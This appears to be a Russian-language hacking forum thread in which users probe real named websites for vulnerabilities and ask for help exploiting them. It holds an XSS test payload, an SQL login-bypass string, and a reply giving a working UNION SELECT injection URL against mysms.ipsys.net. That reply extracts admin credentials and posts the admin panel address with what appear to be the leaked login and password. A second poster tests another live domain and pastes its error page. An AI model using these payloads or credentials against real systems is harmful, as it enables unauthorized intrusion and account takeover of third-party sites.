Есть один сайтег.С виду кул, но мною там было обнаружено баги.В том и дело что только обнаружено. Вот ход моих действий.: !)Иду по сцылге: http://mysms.ipsys.net/ 2)Вижу там "Пошук" и сразу сую джаваскрипт: PHP: "><script>alert()</script> Мне выдает: Понимаю с етим ничево не зделаю.... 3) Смотрю дальше.. И вижу строчку: ОоО.Руки тянутся вбить PHP: /index.php?smstype=phpinj Как результат - Ничево нешарю в mysqlinj, потомо и незнаю что с етим делать... 4) Покопавшись исчо увидил Сразу вбил PHP: ') OR ('1'='1 Ничяво.. Прошу хелпа у знающих... Пасиб за внимание
Code: http://mysms.ipsys.net/index.php?smstype=-7+union+select+1,concat(login,0x3a,pass)+from+admin+limit+0,1 админка: http://mysms.ipsys.net/admin/index.php login:Baltazor pass:stones
http://www.fuck.ru/products.aspx?id=' Значит ли че нить!!!!Иля я просто напрасно это делаю??? Server Error in '/' Application. -------------------------------------------------------------------------------- Runtime Error Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine. Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off". <!-- Web.Config Configuration File --> <configuration> <system.web> <customErrors mode="Off"/> </system.web> </configuration> Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
